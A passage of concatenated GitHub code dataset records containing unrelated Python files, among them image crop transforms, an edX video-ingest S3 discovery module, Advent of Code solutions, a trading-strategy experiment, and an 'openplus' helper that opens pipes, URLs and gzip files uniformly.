Crop square at centre\n pre_transforms = []\n pre_transforms.append(transforms.ToPILImage())\n pre_transforms.append(transforms.Resize(img_input_dim))\n pre_transforms.append(transforms.CenterCrop(img_input_dim))\n self.pre_transforms = transforms.Compose(pre_transforms)\n\n # Transformations of the sliced grid image: To Tensor -> Z-Score Normalize RGB Channels\n post_transforms = []\n post_transforms.append(transforms.ToTensor())\n post_transforms.append(transforms.Normalize(norm_mean, norm_std))\n self.post_transforms = transforms.Compose(post_transforms)\n\n self.kwargs = []\n h_indices = range(img_n_splits)\n w_indices = range(img_n_splits)\n for h in h_indices:\n for w in w_indices:\n self.kwargs.append({'top' : h * crop_step_size,\n 'left' : w * crop_step_size,\n 'height' : crop_dim,\n 'width' : crop_dim})\n\n self.n_blocks = len(self.kwargs)\n\n def __call__(self, img):\n img_ = self.pre_transforms(img)\n return [self.post_transforms(transforms.functional.crop(img_, **kwarg)) for kwarg in self.kwargs]\n","repo_name":"anderzzz/monkey_caput","sub_path":"img_transforms.py","file_name":"img_transforms.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"91"} +{"seq_id":"39770748532","text":"from Backend.GraphQL.shared import query, get_current_user, get_user_document\nfrom Backend.DataTypes.Mention import Mention\nfrom Backend.DataTypes.MentionList import MentionList\nfrom graphql import GraphQLError\n\n@query.field(\"userMentions\")\ndef resolve_user_mentions(_, info):\n mentionarray = []\n current_user = get_current_user(info)\n try:\n user_doc, _ = get_user_document(current_user.uid)\n except Exception as err:\n return GraphQLError(message=err.__str__())\n\n mentions = user_doc.collection('mentions')\n mentions = [doc for doc in mentions.stream()]\n for mention in mentions:\n mention_dict = mention.to_dict()\n mentionarray.append(Mention(mention.id, mention_dict[\"createdAt\"], mention_dict[\"mentionData\"], mention_dict[\"mentioner\"], mention_dict[\"new\"]))\n return MentionList(mentionarray)","repo_name":"DigitalProductschool/rt-backend","sub_path":"Backend/GraphQL/queries/userMentions.py","file_name":"userMentions.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"28365818506","text":"\"\"\"\nmulti-point videofile discovery\nCurrently:\n Amazon S3 (studio-ingest as well as about/marketing\n video ingest\n )\n Local (watchfolder w/o edit priv.)\n\n\"\"\"\n\n\nimport json\nimport logging\nimport os.path\n\nimport boto\nimport boto.s3\nfrom boto.exception import NoAuthHandlerFound, S3DataError, S3ResponseError\nfrom opaque_keys import InvalidKeyError\nfrom opaque_keys.edx.keys import CourseKey\n\nfrom .control_env import *\nfrom VEDA.utils import extract_course_org, get_config\nfrom .veda_file_ingest import VedaIngest, VideoProto\nfrom VEDA_OS01.models import TranscriptCredentials\nfrom .veda_val import VALAPICall\n\ntry:\n boto.config.add_section('Boto')\nexcept:\n pass\nboto.config.set('Boto', 'http_socket_timeout', '100')\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"boto\").setLevel(logging.ERROR)\nLOGGER = logging.getLogger(__name__)\n\n\nclass FileDiscovery(object):\n\n def __init__(self, **kwargs):\n self.video_info = {}\n self.auth_dict = get_config()\n self.bucket = None\n self.node_work_directory = kwargs.get('node_work_directory', WORK_DIRECTORY)\n\n # In stage, a course could possibly not exist in the local database\n # but remain referenced by edx-platform.\n # If the course doesn't exist but a course ID and hex is supplied,\n # create the course anyway.\n self.create_course_override = self.auth_dict['environment'] == \"stage\"\n\n\n def about_video_ingest(self):\n \"\"\"\n Crawl VEDA Upload bucket\n \"\"\"\n if self.node_work_directory is None:\n LOGGER.error('[DISCOVERY] No Workdir')\n return\n try:\n conn = boto.connect_s3()\n except NoAuthHandlerFound:\n LOGGER.error('[DISCOVERY] BOTO Auth Handler')\n return\n try:\n self.bucket = conn.get_bucket(self.auth_dict['veda_s3_upload_bucket'])\n except S3ResponseError:\n return None\n for key in self.bucket.list('upload/', '/'):\n meta = self.bucket.get_key(key.name)\n if meta.name != 'upload/':\n self.about_video_validate(\n meta=meta,\n key=key\n )\n\n def about_video_validate(self, meta, key):\n abvid_serial = meta.name.split('/')[1]\n upload_query = VedaUpload.objects.filter(\n video_serial=meta.name.split('/')[1]\n )\n if len(upload_query) == 0:\n # Non serialized upload - reject\n return\n\n upload_filename = upload_query[0].upload_filename\n\n if upload_filename is not None:\n file_extension = upload_filename.split('.')[-1]\n else:\n upload_filename = 'null_file_name.mp4'\n file_extension = 'mp4'\n\n if len(file_extension) > 4:\n file_extension = ''\n\n LOGGER.info('[ABOUT_DISCOVERY] upload_filename is: ' + upload_filename)\n meta.get_contents_to_filename(\n os.path.join(\n self.node_work_directory,\n upload_filename\n )\n )\n\n course_query = Course.objects.get(institution='EDX', edx_classid='ABVID')\n\n # Trigger Ingest Process\n V = VideoProto(\n abvid_serial=abvid_serial,\n client_title=upload_filename.replace('.' + file_extension, ''),\n file_extension=file_extension,\n )\n\n I = VedaIngest(\n course_object=course_query,\n video_proto=V,\n node_work_directory=self.node_work_directory\n )\n I.insert()\n\n \"\"\"\n Move Key out of 'upload' folder\n \"\"\"\n new_key = '/'.join(('process', meta.name.split('/')[1]))\n key.copy(self.bucket, new_key)\n key.delete()\n\n reset_queries()\n\n def move_video(self, key, destination_dir):\n \"\"\"\n Moves an S3 video key to destination directory within the same bucket.\n\n Arguments:\n key: An S3 file key.\n destination_dir: target directory where the key will be moved eventually.\n \"\"\"\n new_key_name = os.path.join(destination_dir, os.path.basename(key.name))\n key.copy(self.bucket, new_key_name)\n key.delete()\n\n def reject_file_and_update_val(self, key, s3_filename, client_title, course_id):\n \"\"\"\n Moves a video file to rejected videos, update edx-val to 'invalid_token'.\n\n Arguments:\n key: An S3 key to be moved to /rejected\n s3_filename: Name of the file\n client_title: client title from Key's S3 metadata\n course_id: course run identifier\n \"\"\"\n video_proto = VideoProto(\n s3_filename=s3_filename,\n client_title=client_title,\n file_extension='',\n platform_course_url=course_id,\n video_orig_duration=0.0\n )\n # Update val status to 'invalid_token'\n VALAPICall(video_proto=video_proto, val_status=u'invalid_token').call()\n # Move the video file to 'edx-prod/rejected' directory.\n self.move_video(key, destination_dir=self.auth_dict['edx_s3_rejected_prefix'])\n\n def get_or_create_course(self, course_id, course_hex=None):\n \"\"\"\n Retrieves a course associated with course_hex, course_id or a creates new one.\n\n Arguments:\n course_id: course id identifying a course run\n course_hex: studio_hex identifying course runs\n\n Details:\n - if course_hex is there, try getting course with course_hex.\n - otherwise try making use of course_id to get the associated course\n and if no course is associated with the course_id, try creating\n a new course with course_name, institution, edx_classid and\n local_storedir.\n\n \"\"\"\n if not course_hex:\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n return\n\n course = Course.objects.filter(institution=course_key.org, edx_classid=course_key.course).first()\n if course:\n course_runs = course.course_runs\n if course_id not in course_runs:\n course_runs.append(course_id)\n course.local_storedir = ','.join(course_runs)\n course.save()\n else:\n course = self._create_course(course_key, course_id)\n else:\n try:\n course = Course.objects.get(studio_hex=course_hex)\n except Course.DoesNotExist:\n if self.create_course_override:\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n return\n\n course = self._create_course(course_key, course_id, course_hex)\n else:\n return\n\n return course\n\n def _create_course(self, course_key, course_id, studio_hex=None):\n \"\"\"\n Creates a course with the specified parameters.\n If another class needs to create a course, use get_or_create_course\n instead of this method.\n\n Arguments:\n - course_key\n - course_id\n - studio_hex\n \"\"\"\n course_name = '{org} {number}'.format(org=course_key.org, number=course_key.course)\n course = Course.objects.create(\n course_name=course_name,\n institution=course_key.org,\n edx_classid=course_key.course,\n local_storedir=course_id,\n yt_proc=False\n )\n\n if studio_hex:\n setattr(course, 'studio_hex', studio_hex)\n\n return course\n\n def download_video_to_working_directory(self, key, file_name):\n \"\"\"\n Downloads the video to working directory from S3 and\n returns whether its successfully downloaded or not.\n\n Arguments:\n key: An S3 key whose content is going to be downloaded\n file_name: Name of the file when its in working directory\n \"\"\"\n file_ingested = False\n try:\n key.get_contents_to_filename(os.path.join(self.node_work_directory, file_name))\n file_ingested = True\n except S3DataError:\n LOGGER.error('[DISCOVERY] Error downloading the file into node working directory.')\n return file_ingested\n\n def parse_transcript_preferences(self, course_id, transcript_preferences):\n \"\"\"\n Parses and validates transcript preferences.\n\n Arguments:\n course_id: course id identifying a course run.\n transcript_preferences: A serialized dict containing third party transcript preferences.\n \"\"\"\n try:\n transcript_preferences = json.loads(transcript_preferences)\n TranscriptCredentials.objects.get(\n org=extract_course_org(course_id),\n provider=transcript_preferences.get('provider')\n )\n except (TypeError, TranscriptCredentials.DoesNotExist):\n # when the preferences are not set OR these are set to some data in invalid format OR these don't\n # have associated 3rd party transcription provider API keys.\n transcript_preferences = None\n except ValueError:\n LOGGER.error('[DISCOVERY] Invalid transcripts preferences=%s', transcript_preferences)\n transcript_preferences = None\n\n return transcript_preferences\n\n def validate_metadata_and_feed_to_ingest(self, video_s3_key):\n \"\"\"\n Validates the video key and feed it to ingestion phase.\n\n Arguments:\n video_s3_key: An S3 Key associated with a (to be ingested)video file.\n\n Process/Steps:\n 1 - Get or create an associated course for a video.\n 2 - Download video to node working directory from S3.\n 3 - Check if this video has valid 3rd Party transcript provider along with the preferences.\n 4 - Set up an ingest instance and insert video to ingestion phase.\n 5 - On completing ingestion, mark the video file as processed.\n\n Note:\n Failure at any discovery point will cause video file to be marked as rejected.\n \"\"\"\n client_title = video_s3_key.get_metadata('client_video_id')\n course_hex = video_s3_key.get_metadata('course_video_upload_token')\n course_id = video_s3_key.get_metadata('course_key')\n transcript_preferences = video_s3_key.get_metadata('transcript_preferences')\n filename = os.path.basename(video_s3_key.name)\n\n # Try getting course based on the S3 metadata set on the video file.\n course = self.get_or_create_course(course_id, course_hex=course_hex)\n if course:\n # Download video file from S3 into node working directory.\n file_extension = os.path.splitext(client_title)[1][1:]\n file_downloaded = self.download_video_to_working_directory(video_s3_key, filename)\n if not file_downloaded:\n # S3 Bucket ingest failed, move the file rejected directory.\n self.move_video(video_s3_key, destination_dir=self.auth_dict['edx_s3_rejected_prefix'])\n return False\n\n # Prepare to ingest.\n video_metadata = dict(\n s3_filename=filename,\n client_title=client_title,\n file_extension=file_extension,\n platform_course_url=course_id,\n )\n # Check if this video also having valid 3rd party transcription preferences.\n transcript_preferences = self.parse_transcript_preferences(course_id, transcript_preferences)\n if transcript_preferences is not None:\n video_metadata.update({\n 'process_transcription': True,\n 'provider': transcript_preferences.get('provider'),\n 'three_play_turnaround': transcript_preferences.get('three_play_turnaround'),\n 'cielo24_turnaround': transcript_preferences.get('cielo24_turnaround'),\n 'cielo24_fidelity': transcript_preferences.get('cielo24_fidelity'),\n 'preferred_languages': transcript_preferences.get('preferred_languages'),\n 'source_language': transcript_preferences.get('video_source_language'),\n })\n\n ingest = VedaIngest(\n course_object=course,\n video_proto=VideoProto(**video_metadata),\n node_work_directory=self.node_work_directory\n )\n ingest.insert()\n\n if ingest.complete:\n # Move the video file into 'prod-edx/processed' or 'stage-edx/processed\n # directory, if ingestion is complete.\n self.move_video(video_s3_key, destination_dir=self.auth_dict['edx_s3_processed_prefix'])\n\n return ingest.complete\n else:\n # Reject the video file and update val status to 'invalid_token'\n self.reject_file_and_update_val(video_s3_key, filename, client_title, course_id)\n return False\n","repo_name":"edx-unsupported/edx-video-pipeline","sub_path":"control/veda_file_discovery.py","file_name":"veda_file_discovery.py","file_ext":"py","file_size_in_byte":13262,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"91"} +{"seq_id":"16689475387","text":"import zmq\nimport time \n\nport=\"5546\"\ncontext = zmq.Context()\nsocket=context.socket(zmq.REP)\nsocket.bind(\"tcp://*:%s\" % port)\n\nwhile True:\n message=socket.recv_string()\n print(message)\n time.sleep(1)\n send=\"got it\"\n socket.send_string(send)\n","repo_name":"alecbidaran/Python_excersies-","sub_path":"reqprep_server.py","file_name":"reqprep_server.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12241213378","text":"import os\nfrom datetime import datetime, timezone\n\nlocal_time = datetime.now()\nutc_time = datetime.utcnow()\nlocal_tz = local_time.astimezone().tzinfo.tzname(local_time)\n\nprint(\"Hello, world!\")\nif \"GITHUB_WORKFLOW\" in os.environ:\n print(\n f\"GitHub workflow '{os.environ['GITHUB_WORKFLOW']}' triggered by '{os.environ['GITHUB_EVENT_NAME']}' via actor '{os.environ['GITHUB_ACTOR']}'\"\n )\nprint(f\"local time is: {local_time} {local_tz}\")\nprint(f\" utc time is: {utc_time} GMT\")\n","repo_name":"skullgoblet1089/test-workflows","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"70808448304","text":"#!/usr/bin/env python3\nimport dataclasses\n\nimport utils\nfrom year_2018.day_24 import part_a\n\n\nclass Challenge(utils.BaseChallenge):\n def solve(self, _input, debug=False):\n \"\"\"\n >>> Challenge().default_solve()\n 2344\n \"\"\"\n group_set = GroupSetExtended.from_groups_text(_input)\n smallest_required_boost = BoostSolver().find_smallest_required_boost(\n group_set, 'Immune System', debug=debug)\n boosted = group_set.boost(smallest_required_boost, 'Immune System')\n boosted.step_many(debug=debug)\n return boosted.get_unit_count()\n\n\nclass BoostSolver:\n def find_smallest_required_boost(self, group_set, benefactor, debug=False):\n is_boost_enough = self.get_is_boost_enough(group_set, benefactor)\n\n min_boost = 0\n if is_boost_enough(min_boost, debug=debug):\n return min_boost\n\n return utils.helper.find_smallest_required_value(\n min_boost, is_boost_enough,\n debug=debug)\n\n def get_is_boost_enough(self, group_set, benefactor):\n def is_boost_enough(boost, debug=False):\n boosted = group_set.boost(boost, benefactor)\n boosted.step_many(debug=debug)\n winning_side = boosted.get_winning_side()\n return winning_side == benefactor\n\n return is_boost_enough\n\n\nclass GroupSetExtended(part_a.GroupSet):\n def boost(self, boost, benefactor):\n cls = type(self)\n return cls([\n group.boost(boost)\n if group.faction == benefactor else\n group.copy()\n for group in self.groups\n ])\n\n def get_winning_side(self):\n remaining_factions = {\n group.faction\n for group in self.groups\n }\n if not remaining_factions:\n return None\n if len(remaining_factions) > 1:\n return None\n\n winning_side, = remaining_factions\n\n return winning_side\n\n\nclass GroupExtended(part_a.Group):\n def boost(self, boost):\n return dataclasses.replace(self, attack=self.attack + boost)\n\n def copy(self):\n return dataclasses.replace(self)\n\n\nGroupSetExtended.group_class = GroupExtended\n\n\nChallenge.main()\nchallenge = Challenge()\n","repo_name":"costas-basdekis/advent-of-code-submissions","sub_path":"year_2018/day_24/part_b.py","file_name":"part_b.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"31610773494","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\n\nif len(sys.argv) > 1:\n infilename = sys.argv[1]\nelse:\n infilename = 'input.txt'\n\nwith open(infilename, 'r') as infile:\n buf = infile.read()\n\n# these are entierly for pretty-printing.\ndirections = (\"W\", \"S\", \"E\", \"N\") #start this at 0\n# what direction we're traveling. Follows the set above.\ndirection = 0\n# our current position on the map\npos = [1, 1]\n# how far we need to travel\ndist = 1\n# how far we've traveled in this direction\ndist_state = 0\n\n# a dict of previously seen coords and their values.\nstates = {(0,0):1, (1,0): 1, (1, 1): 2}\n\n# see the details of part 1 for how this works. This is just that same algorithm, but with caching of previous states, and then\n# figuring out which other previous positions we need to grab, and grabbing them and summing them.\n\nwhile True:\n # before east and west, we have to increment how far we travel, but only if we just turned.\n if direction % 2 == 0 and dist_state == 0:\n dist += 1\n\n # list of coords to fetch out of the lookup table and sum up.\n to_sum = []\n\n # west\n if direction == 0:\n pos[0] -= 1\n to_sum.append((pos[0] - 1, pos[1] - 1))\n to_sum.append((pos[0] , pos[1] - 1))\n to_sum.append((pos[0] + 1, pos[1] - 1))\n to_sum.append((pos[0] + 1, pos[1]))\n\n # south\n elif direction == 1:\n pos[1] -= 1\n to_sum.append((pos[0] , pos[1] + 1))\n to_sum.append((pos[0] + 1, pos[1] - 1))\n to_sum.append((pos[0] + 1, pos[1] ))\n to_sum.append((pos[0] + 1, pos[1] + 1))\n\n # east\n elif direction == 2:\n pos[0] += 1\n to_sum.append((pos[0] - 1, pos[1] + 1))\n to_sum.append((pos[0] , pos[1] + 1))\n to_sum.append((pos[0] + 1, pos[1] + 1))\n to_sum.append((pos[0] - 1, pos[1]))\n\n # north\n elif direction == 3:\n pos[1] += 1\n to_sum.append((pos[0] , pos[1] - 1))\n to_sum.append((pos[0] - 1, pos[1] - 1))\n to_sum.append((pos[0] - 1, pos[1] ))\n to_sum.append((pos[0] - 1, pos[1] + 1))\n\n # increment how far we've traveled in this direction\n dist_state += 1\n\n\n # grab the sum of the coords we need to sum up.\n total = 0\n for coord in to_sum:\n print(coord)\n if coord in states:\n total += states[coord]\n\n states [(pos[0], pos[1])] = total\n\n print(\"position: {}, direction: {}, dist_state: {}, dist: {}, total: {}\".format(\n pos,\n directions[direction],\n dist_state,\n dist,\n total\n ))\n\n # check for our finish condition\n if total > int(buf):\n print(total)\n break\n\n # check if we need to turn a corner.\n if dist == dist_state:\n dist_state = 0\n direction += 1\n direction %= 4\n","repo_name":"VisionistInc/advent-of-code-2017","sub_path":"joshgordon/03/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"24034471805","text":"# %%\nimport StrategyLearner as sl\nimport pandas as pd\nimport datetime as dt\nfrom marketsimcode import compute_portvals\nimport matplotlib.pyplot as plt\nimport ManualStrategy\n\n# %%\ndef author():\n return 'mwu344'\n\n# %%\ndef experiment1(debug=False):\n \n commission = 9.95\n impact = 0.005\n start_value = 100000\n start_date = dt.datetime(2008,1,1)\n end_date = dt.datetime(2009,12,31)\n\n ms = ManualStrategy.ManualStrategy()\n df_trades_ms = ms.testPolicy(symbol='JPM', sd=start_date, ed=end_date, sv=start_value)\n df_portval_ms = compute_portvals(df_trades_ms, commission=commission, impact=impact)\n\n learner = sl.StrategyLearner(verbose=False, impact=impact, commission=commission)\n learner.add_evidence(symbol='JPM', sd=start_date, ed=end_date, sv=start_value)\n df_trades_sl = learner.testPolicy(symbol='JPM', sd=start_date, ed=end_date, sv=start_value)\n df_portval_sl = compute_portvals(df_trades_sl, impact=impact, commission=commission)\n\n df_trades_bm = pd.DataFrame(0, index=df_trades_sl.index, columns=df_trades_sl.columns)\n df_trades_bm.iloc[0] = 1000\n df_portval_bm = compute_portvals(df_trades_bm, commission=commission, impact=impact)\n\n df_compare = pd.DataFrame(index=df_portval_sl.index, columns=['StrategyLearner', 'ManualStrategy', 'Benchmark'])\n df_compare.StrategyLearner = df_portval_sl / df_portval_sl.iloc[0]\n df_compare.ManualStrategy = df_portval_ms / df_portval_ms.iloc[0]\n df_compare.Benchmark = df_portval_bm / df_portval_bm.iloc[0]\n\n df_compare.plot()\n plt.xlabel('Date')\n plt.ylabel('Norm portfolio value')\n plt.grid()\n plt.title('Experiment 1')\n\n if debug:\n plt.show()\n else:\n plt.savefig('experiment1.png')\n\n# %%\nif __name__ == \"__main__\":\n\n experiment1(debug=True)\n","repo_name":"flowing-time/QLearning-Implementation-Application","sub_path":"experiment1.py","file_name":"experiment1.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"39323372102","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom logging import getLogger, StreamHandler, NullHandler, DEBUG\nimport configparser\nfrom py4j.java_gateway import JavaGateway\nimport subprocess\nimport time\nimport glob\n\nsys.path.append(os.getcwd())\n\n# デバッガーの設定\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler = NullHandler()\n# handler.setLevel(DEBUG)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n\n# configファイルの読み込み\ninifile = configparser.ConfigParser()\ninifile.read(\"config.ini\")\n\n\n# seq2seq用の学習データを作るクラス\nclass Data_Maker:\n skeleton_type = {\"MethodContent\": True,\n \"ClassContent\": True,\n \"CheckSemicolon\": True,\n \"CloseBracket\": True}\n\n def __init__(self, db,\n show_code=True, simple_mode=False,\n keyword=\"java\", debug_flag=False, art_id=-1):\n\n logger.debug(\"Data Maker initialized\")\n self.show_code = show_code\n self.simple_mode = simple_mode\n self.keyword = keyword\n\n self.scroll_size = 1000\n\n # For debug\n self.debug_flag = debug_flag\n self.art_id = art_id\n\n # configファイルからの読み込み\n self.out_path = inifile[\"Data_Maker\"][\"out_path\"]\n self.py4j_jar_path = inifile[\"Enviroment\"][\"py4j_jar_path\"] \n self.jar_path = inifile[\"Data_Maker\"][\"jar_path\"]\n self.base_info_dir = inifile[\"Data_Maker\"][\"base_info_dir\"]\n\n # 出力ファイルの初期化\n self.init_file(self.out_path)\n\n def run(self):\n # java gatewayサーバーを立ち上げる\n # クラスパスを指定して実行\n args = ([\"java\",\n \"-cp\", self.py4j_jar_path,\n \"-jar\", self.jar_path])\n subprocess.Popen(args)\n\n # サーバー起動前に処理が下へ行くのを防ぐ\n time.sleep(3)\n gateway = JavaGateway(start_callback_server=True)\n app = gateway.entry_point\n\n print(\"Data Maker running\")\n\n\n # 中間データの読み込み\n total = 0\n for directory in glob.glob(self.base_info_dir+\"/*\"):\n total += self.process_page(directory, app)\n print(\"total: {0}\".format(total))\n\n # プロセスをkill\n gateway.shutdown()\n\n def process_page(self, directory, app):\n q_source = \"\"\n a_source = \"\"\n try:\n with open(directory+\"/q_src.java\") as f:\n q_source = f.read()\n with open(directory+\"/a_src.java\") as f:\n a_source = f.read()\n except FileNotFoundError:\n print(directory+\" does not contain files\")\n return 0\n\n q_id, a_id = directory.split(\"/\")[-1].split(\"-\")\n\n print(\"# ID:{0} is being extracted # Pair({1})\".format(\n q_id, directory.split(\"/\")[-1]))\n\n # データの整形\n data = {\"q_id\": q_id, \"a_id\": a_id,\n \"q_src\": q_source, \"a_src\": a_source}\n try:\n shaped_data = self.shape_data(app, data, directory)\n except FileNotFoundError:\n print(directory+\" does not contain files\")\n return 0\n\n # データの書き出し\n self.write(self.out_path, shaped_data)\n\n return 1\n\n # データの整形\n def shape_data(self, app, data, directory):\n ret = []\n q_id = data[\"q_id\"]\n a_id = data[\"a_id\"]\n q_src = data[\"q_src\"]\n a_src = data[\"a_src\"]\n \n q_tokens = app.get_token(q_src)\n a_tokens = app.get_token(a_src)\n\n # ディレクトリの確認\n q_anchor_path = directory+\"/q_anchor.txt\"\n a_anchor_path = directory+\"/a_anchor.txt\"\n addition_path = directory+\"/addition.txt\"\n removal_path = directory+\"/removal.txt\"\n if not os.path.exists(q_anchor_path):\n print(directory+\" does not exists\")\n raise FileNotFoundError\n if not os.path.exists(a_anchor_path):\n print(directory+\" does not exists\")\n raise FileNotFoundError\n if not os.path.exists(addition_path):\n print(directory+\" does not exists\")\n raise FileNotFoundError\n if not os.path.exists(removal_path):\n print(directory+\" does not exists\")\n raise FileNotFoundError\n\n # recommendの整形\n q_anchor = []\n with open(q_anchor_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n q_anchor.append((index, code))\n \n a_anchor = []\n with open(a_anchor_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n a_anchor.append((index, code))\n\n # 挿入操作をまとめる\n recommends = []\n with open(addition_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n line_in_clone = -1\n for i in range(0, len(a_anchor)):\n if a_anchor[i][0] > index:\n line_in_clone = i\n elif line_in_clone == -1:\n if len(q_anchor) > 0:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[0][1]))\n else:\n recommends.append(\" \"+app.get_token(code))\n break\n else:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[line_in_clone][1]))\n break\n if len(recommends) == 0:\n recommend_str = \"\"\n else:\n recommend_str = \" \".join(recommends) + \" \"\n \n ret.append([q_id, a_id, q_tokens, recommend_str])\n\n # 削除操作をまとめる\n recommends = []\n with open(removal_path) as f:\n for line in f:\n content = line.split(\" \", 2)\n index = int(content[1])\n code = content[2].replace(\"\\n\", \"\")\n line_in_clone = -1\n for i in range(0, len(q_anchor)):\n if q_anchor[i][0] > index:\n line_in_clone = i\n elif line_in_clone == -1:\n if len(a_anchor) > 0:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[0][1]))\n else:\n recommends.append(\" \"+app.get_token(code))\n break\n else:\n recommends.append(\" \"+\n app.get_token(code)+\" \"+app.get_token(q_anchor[line_in_clone][1]))\n break\n if len(recommends) == 0:\n recommend_str = \"\"\n else:\n recommend_str = \" \".join(recommends) + \" \"\n \n ret.append([q_id, a_id, q_tokens, recommend_str])\n \n return ret\n\n # 出力先の初期化\n def init_file(self, out_path):\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n with open(out_path+\"/input.txt\", \"w\") as f_i:\n f_i.write(\"\")\n with open(out_path+\"/output.txt\", \"w\") as f_o:\n f_o.write(\"\")\n\n # データの書き出し\n def write(self, out_path, data_list):\n with open(out_path+\"/input.txt\", \"a\") as f_i:\n with open(out_path+\"/output.txt\", \"a\") as f_o:\n for i, (q_id, a_id, q_token, a_token) in enumerate(data_list):\n f_i.write(\"{0}-{1} {2} {3}\\n\".format(\n q_id, a_id, i, q_token.replace('\\n', '
')))\n f_o.write(\"{0}-{1} {2} {3}\\n\".format(q_id, a_id, i, a_token))\n\n\nclass ConvertError(Exception):\n def __str__(self):\n return \"This is Convert Exception\"\n","repo_name":"nitamago/DebugConcierge","sub_path":"Data_Maker/Data_Maker.py","file_name":"Data_Maker.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"29708114894","text":"\"\"\" open pipes, urls ... uniformly with Popen, urlopen ... open\n\nopenplus() opens pipes and some other objects that quack like files,\nas well as files:\n | pipe ... -- Popen() a shell\n http:// ftp:// ... -- urlopen()\n `ls $x`, `geturl web data` -- shell -> filename or url\n ~/a/b -- sh ls\n .gz -- gunzip\n - -- stdin / stdout\n else -- the builtin open()\n\nUsers can then read e.g.\n \"| filter data | sort\"\n \"| convert ... xx.jpg\"\n \"`geturl web data`\"\nlike files, just by importing openplus and changing open() -> openplus().\n\nThe idea is that if it walks like a file and quacks like a file,\ni.e. can open/get/put a data stream, or generates a file name or object,\nlet it be used anywhere a \"real\" file can be used.\n(However xxopen() may lack some methods of __builtin__.open() .)\n\nError handling is left up to Popen() ... open()\nexcept for `shell expand`, which writes an error message to errout (sys.stderr)\nif the result is not a url or os.path.isfile().\n\n\"\"\"\n # wibni: > awindow, < aparamwindow -- pyqt\n # reinventing this wheel ...\n\nimport gzip\nimport os.path\nimport re\nimport subprocess # py 2.4\nimport sys\nimport urllib2\n\n__version__ = __date__ = \"11dec2008\"\n__author__ = \"Denis Bzowy\"\n\n_urlpat = re.compile( \"[a-z+]+://\" ) # http:// ftp:// ... 20+ in urlparse\n\n#-------------------------------------------------------------------------------\ndef openplus( filelike, rw='r', errout=sys.stderr ):\n \"\"\" open pipes, urls ... uniformly with Popen, urlopen ... open \"\"\"\n start = filelike[0]\n if start == '|':\n if rw[0] == 'r':\n return subprocess.Popen( filelike[1:], shell=True,\n stdout=subprocess.PIPE) .stdout\n # for line in a pipe: see http://bugs.python.org/issue3907\n else:\n return subprocess.Popen( filelike[1:], shell=True,\n stdin=subprocess.PIPE) .stdin\n\n elif _urlpat.match( filelike ):\n return urllib2.urlopen( filelike )\n\n elif start == '~': # ~/x -> $HOME/x, ~sam/x -> sam's home /x (aka glob)\n ls = sh( \"/bin/ls -d \" + filelike, errout ) # not all shells\n return open( ls, rw )\n\n elif start == '`':\n # sh: `ls ${x-default}`, `newest *.py`, `geturl web data`\n # -> filename or url, not | etc.\n shexpand = sh( filelike.strip('`'), errout )\n if _urlpat.match( shexpand ):\n return urllib2.urlopen( filelike )\n if os.path.isfile( shexpand ):\n return open( shexpand, rw )\n if errout: # logger ?\n print >>errout, \"error: openplus( \\\"%s\\\" ) = \\\"%s\\\" \" \\\n \"is not a file or url\" % (filelike, shexpand)\n return None\n\n # ! eval pyfunc() -> a file-like object with next() etc.\n # elif start == '!':\n # return eval( filelike[1:] ) # wrong globals(), unsafe, mttiw\n\n elif filelike.endswith( \".gz\" ):\n return gzip.GzipFile( filelike, rw )\n\n elif filelike == '-':\n return (sys.stdin if rw[0] == 'r' else sys.stdout)\n\n else:\n return open( filelike, rw ) # a \"real\" file\n\n\n#...............................................................................\ndef sh( cmd_arg_str, errout=sys.stderr ):\n r\"\"\" Popen a shell -> line or \"line1 \\n line2 ...\", trim last \\n \"\"\"\n # crashes after pyqt QApplication() with mac py 2.5.1, pyqt 4.4.2 \n # subprocess.py _communicate select.error: (4, 'Interrupted system call')\n # see http://bugs.python.org/issue1068268 subprocess is not EINTR-safe\n # QProcess instead of Popen works\n\n (lines, err) = subprocess.Popen( cmd_arg_str,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True ) \\\n .communicate() # wait til process ends\n if errout and err:\n print >>errout, err\n # trim the last \\n so sh( \"ls xx\" ) -> \"xx\" not \"xx\\n\"\n # and split( \"\\n\" ) -> no extra \"\"\n return 